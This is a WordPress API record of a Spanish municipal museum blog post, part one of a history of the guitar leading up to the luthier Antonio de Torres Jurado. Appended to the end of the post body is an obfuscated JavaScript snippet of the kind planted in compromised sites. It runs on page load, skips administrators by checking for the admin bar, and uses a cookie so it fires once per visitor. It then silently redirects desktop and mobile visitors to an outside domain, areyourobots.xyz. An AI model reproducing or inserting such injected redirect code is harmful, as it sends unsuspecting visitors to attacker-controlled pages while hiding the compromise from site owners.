{"id":3027,"date":"2017-09-06T12:36:17","date_gmt":"2017-09-06T12:36:17","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=3027"},"modified":"2018-01-15T10:35:21","modified_gmt":"2018-01-15T10:35:21","slug":"una-pequena-historia-de-la-gran-historia-de-la-guitarra-i","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2017\/09\/06\/una-pequena-historia-de-la-gran-historia-de-la-guitarra-i\/","title":{"rendered":"UNA PEQUE\u00d1A HISTORIA DE LA GRAN HISTORIA DE LA GUITARRA (I)"},"content":{"rendered":"<p><span style=\"color: #444444\"><span style=\"font-size: medium\">Con motivo del 200 aniversario del nacimiento del guitarrero Antonio de Torres Jurado \u2013 el considerado padre de la guitarra actual- el pr\u00f3ximo 13 de junio y dado a que naci\u00f3 en el barrio de La Ca\u00f1ada de Almer\u00eda, Reino de Granada en el s XIX y las referencias documentales sobre su aprendizaje lo sit\u00faan en el taller que mont\u00f3 en Vera, al trasladarse a dicha ciudad cuando contaba con 12 a\u00f1os de edad , que mejor momento para reivindicar a este instrumento de madera en toda su evoluci\u00f3n hist\u00f3rica y su renovaci\u00f3n en Vera a trav\u00e9s de las manos e ingenio de este carpintero y guitarrero Antonio de Torres Jurado.<\/span><\/span><\/p>\n<p><!--more--><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Imagen6.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-3033\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Imagen6.jpg\" alt=\"\" width=\"700\" height=\"440\" \/><\/a><\/p>\n<p><span style=\"color: #444444\"><span style=\"font-size: x-large\"><b>Los or\u00edgenes de este instrumento de madera<\/b><\/span><\/span><\/p>\n<p><span style=\"color: #444444\"><span style=\"font-size: medium\">Seg\u00fan plasma <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>F. LLauge<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> en su art\u00edculo \u201c<\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>Peque\u00f1as Historias de la Historia. La guitarra\u201d (Algo, 1976)<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> todo parece indicar \u2013y as\u00ed lo corroboramos los arque\u00f3logos y estudiosos del mundo de la etnomusicolog\u00eda- que la guitarra, al menos en su configuraci\u00f3n primitiva, es uno de los instrumentos musicales m\u00e1s antiguos. Se supone un lejano origen mesopot\u00e1mico de la misma, a juzgar por las representaciones existentes en monumentos caldeo-asirios y egipcios de la <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>citara<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\">, instrumento de la que parece derivar la guitarra en el G\u00e9nesis, primer libro de la biblia, en el cap\u00edtulo VI, se afirma que <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>Tubal<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> fue padre de los que ta\u00f1en la citara. E incluso se quiere ver en el <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>sistro<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> de los antiguos egipcios una primitiva forma de guitarra.<\/span><\/span><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Atorres-etiq-a\u00f1o-1864.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-3038\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Atorres-etiq-a\u00f1o-1864.jpg\" alt=\"\" width=\"985\" height=\"768\" \/><\/a><\/p>\n<p><span style=\"color: #444444\"><span style=\"font-size: medium\">Fue en Grecia el primer pa\u00eds occidental que cultiv\u00f3 y desarroll\u00f3 la m\u00fasica instrumental\u2026 gracias a las conquistas de Alejandro Magno (siglo IV a.C) , los griegos se apoderaron de Persia y Egipto, llegando hasta la India, asimilando muchas de las costumbres de los lugares que avasallaban. De esta manera, pasaron a Grecia los antiguos instrumentos musicales de Oriente, y, entre ellos, la c\u00edtara, o <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>kitharah<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> asiria, que en griego fue <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>kithara<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> y, m\u00e1s tarde, en \u00e1rabe, <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>qitar<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\">, <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>quitara<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\">, de donde derivar\u00eda la voz castellana <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>guitarra<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\">, aunque este instrumento difiera mucho de aqu\u00e9l, en forma, pero no en conceptualizaci\u00f3n.<\/span><\/span><\/p>\n<p><span style=\"color: #444444\"><span style=\"font-size: medium\">Los autores latinos hablan de una <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>citara hisp\u00e1nica<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> o tambi\u00e9n <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>sistrum<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\">, que se usaba con frecuencia en los banquetes y solemnidades. La histo9ria nos indica que la <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>kithara<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> griega pas\u00f3 a Roma, mientras que la <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>kitharah<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> asiria, a trav\u00e9s de Persia, se introdujo en el islam; la primera se transform\u00f3 en <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>cithara romana<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\">, y la segunda en <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>qitar sarracena<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\">. En Espa\u00f1a, encrucijada entre tres culturas (la cristianas, isl\u00e1mica y jud\u00eda), se difundieron los dos instrumentos, aunque el de origen musulm\u00e1n tuvo mayor importancia y difusi\u00f3n, hasta el punto de que a trav\u00e9s de los espa\u00f1oles se extendi\u00f3 por Europa\u2026 eclipsando en muchas partes al instrumento de origen latino.<\/span><\/span><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Imagen2.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-3029\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Imagen2.jpg\" alt=\"\" width=\"299\" height=\"300\" \/><\/a><\/p>\n<p><span style=\"color: #444444\"><span style=\"font-size: xx-large\"><b>Evoluci\u00f3n de la guitarra<\/b><\/span><\/span><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Imagen3.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3030\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Imagen3.jpg\" alt=\"\" width=\"728\" height=\"546\" \/><\/a><\/p>\n<p><span style=\"color: #444444\"><span style=\"font-size: medium\">Hay dos formas de guitarra: la oriental isl\u00e1mica y la latina. La primera se caracteriza por el fondo abombado de la caja de resonancia, el <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>clavijero<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> plano, la <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>roseta<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> que decora el <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>o\u00eddo<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\">, o abertura circular de la caja, y los <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>trastes, <\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\">mientras que la<\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i> latina <\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\">se distingue por el <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>aro<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> o <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>eclisa<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> (pared lateral que resigue perpendicularmente la tapa y el fondo), el fondo plano (modernamente algo bombeado), y el clavijero canalizado con remate superior ornamentado, en el que se representa la cabeza de un animal, o bien muestra una voluta.<\/span><\/span><\/p>\n<p><span style=\"color: #444444\"><span style=\"font-size: medium\">La guitarra \u00e1rabe se difundi\u00f3 en la pen\u00ednsula ib\u00e9rica durante los siglos X al XII. En el siglo XIII cobr\u00f3 especial importancia la guitarra. La palabra <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>guitarra<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> la encontramos ya en el Arcipestre de Hita (siglo XIV), quien distingue entre <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>guitarra mora<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> y <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>guitarra latina<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\">. Esta \u00faltima dio origen a la <\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"><i>vihuela<\/i><\/span><\/span><span style=\"color: #444444\"><span style=\"font-size: medium\"> y, posiblemente, a la vi\u00e8le francesa.<\/span><\/span><\/p>\n<p><span style=\"color: #444444\"><span style=\"font-size: medium\">La vihuela goz\u00f3 del favor aristocr\u00e1tico muy pronto, mientras que la guitarra, considerada como instrumento del pueblo, no logr\u00f3 imponerse hasta el siglo XIV, alcanzando cierto esplendor hasta el siglo XVII, para decaer en el XVIII, si bien a fines de \u00e9ste y comienzos del XIX, cobr\u00f3 cierto auge entre los poderosos, hasta el punto de que lleg\u00f3 a hacer una seria competencia al clave en los palacios reales y las mansiones de la nobleza (y de los claves hablaremos en otros momento de fernadez constructor de clavecines en la cortes de Madrid, nacido en Vera en el siglo XVIII ).<\/span><\/span><\/p>\n<p><span style=\"color: #444444\"><span style=\"font-size: medium\">Despu\u00e9s, desde el punto de vista social, se inici\u00f3 la decadencia de la guitarra, puesto que su uso qued\u00f3 relegado a las clases eminentemente populares, hasta el punto de que en pleno siglo XX se ha convertido en el instrumento preferido del pueblo.<\/span><\/span><\/p>\n<p><span style=\"color: #444444\"><span style=\"font-size: medium\">Sebasti\u00e1n de Covarrubias, en su Tesoro de la Lengua Castellana (Madrid, 1611), nos dice en la voz guitarra:<\/span><\/span><\/p>\n<p><span style=\"color: #444444\">\u201c<span style=\"font-size: medium\"><i>Instrumento bien conocido y exercitado muy en perjuycio de la m\u00fasica; que antes se ta\u00f1\u00eda en la vig\u00fcela, instrumento de seis y algunas veces de m\u00e1s \u00f3rdenes. Es la guitarra, vig\u00fcela peque\u00f1a en el tama\u00f1o, y tambi\u00e9n en las cuerdas, porque no tiene m\u00e1s que cinco cuerdas, y algunos son solas las quatro \u00f3rdenes\u2026\u201d<\/i><\/span><\/span><\/p>\n<p>En efecto, el n\u00famero de cuerdas que tuvo la guitarra en un principio fue el de 4, habi\u00e9ndole agregado la 5\u00aa el c\u00e9lebre ronde\u00f1o Vicente Espinel a fines del siglo XVI, de una manera definitiva. No se sabe a punto fijo quien a\u00f1adi\u00f3 la 6\u00aa, pero lo cierto es que, a finales del siglo XVIII, en Italia era muy popular la de 5 cuerdas.<\/p>\n<p>La antigua <i>guitarra alemana<\/i> o <i>tudesca<\/i> s\u00f3lo constaba de 4 cuerdas y su caja era oval.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Imagen4.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3031\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Imagen4.jpg\" alt=\"\" width=\"220\" height=\"319\" \/><\/a><\/p>\n<p><a name=\"_GoBack\"><\/a>El punteado en la guitarra se atribuye al monje cisterciense fray Miguel Garc\u00eda, conocido popularmente por el Padre Basilio, organista en su monasterio de Madrid, que fue maestro de la reina Mar\u00eda Luisa, esposa de Carlos IV, el cual sustituy\u00f3 la forma de tocar rasgueada, o populachera, por el antiguo punteado con los dedos.<\/p>\n<p>Entre los tratados m\u00e1s antiguos e importantes acerca de este instrumento musical hay que citar los siguientes: <i>Declaraci\u00f3n de instrumentos<\/i> de J. Osuna (Le\u00f3n, 1555), <i>Guitarra espa\u00f1ola y bandola en dos maneras de guitarra, castellana y catalana de cinco \u00f3rdenes<\/i>, de Juan C. Amat (Barcelona, 1598), <i>M\u00e9todo muy facil\u00edssimo para aprender a ta\u00f1er la guitarra a lo espa\u00f1ol de Brice\u00f1o (<\/i>Par\u00eds, 1627) y <i>Nuevo m\u00e9todo de cifra para tocar la guitarra<\/i> de Velasco (N\u00e1poles, 1640).<\/p>\n<p>En Espa\u00f1a, durante la guerra de la Independencia, la guitarra fue la compa\u00f1era inseparable de los guerrilleros y soldados a lo largo y ancho de la geograf\u00eda espa\u00f1ola. Incluso los soldados espa\u00f1oles que en 1807 salieron con el marqu\u00e9s de la Romana hacia Dinamarca, atravesando Francia y Alemania, llevaban muchas guitarras en bandolera, instrumento que se hizo muy popular en Alemania.<\/p>\n<p>Y a partir de 1847 aparece en la peque\u00f1a gran Historia de la guitarra Antonio de torres, del que hablaremos en el siguiente cap\u00edtulo.Hoy en d\u00eda, en todas las revoluciones, la guitarra es instrumento indispensable para alegrar el descanso del guerrero y reivindicaci\u00f3n social.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Imagen5.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3032\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Imagen5.jpg\" alt=\"\" width=\"638\" height=\"479\" \/><\/a><\/p>\n<p style=\"text-align: right\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Domingo-Ortiz-2012.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-3035\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2017\/09\/Domingo-Ortiz-2012.jpg\" alt=\"\" width=\"160\" height=\"264\" \/><\/a><\/p>\n<p style=\"text-align: right\">Domingo Ortiz Soler<\/p>\n<p style=\"text-align: right\">Museo Hist\u00f3rico Municipal<\/p>\n<p>Ayto de Vera<\/p>\n<p>&nbsp;<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Con motivo del 200 aniversario del nacimiento del guitarrero Antonio de Torres Jurado \u2013 el considerado padre de la guitarra actual- el pr\u00f3ximo 13 de junio y dado a que naci\u00f3 en el barrio de La Ca\u00f1ada de Almer\u00eda, Reino de Granada en el s XIX y las referencias documentales sobre su aprendizaje lo sit\u00faan &hellip; <a href=\"https:\/\/blog.vera.es\/cultura\/2017\/09\/06\/una-pequena-historia-de-la-gran-historia-de-la-guitarra-i\/\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">UNA PEQUE\u00d1A HISTORIA DE LA GRAN HISTORIA DE LA GUITARRA (I)<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":3034,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[110,109,4],"tags":[231,57,232,233,17,268],"class_list":["post-3027","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-arte-artesania","category-historia","category-museo","tag-antonio-de-torres","tag-domingo-ortiz-soler","tag-guitarra","tag-musica","tag-personajes-historicos","tag-s-xix"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3027","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=3027"}],"version-history":[{"count":4,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3027\/revisions"}],"predecessor-version":[{"id":3039,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3027\/revisions\/3039"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/3034"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=3027"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=3027"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=3027"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}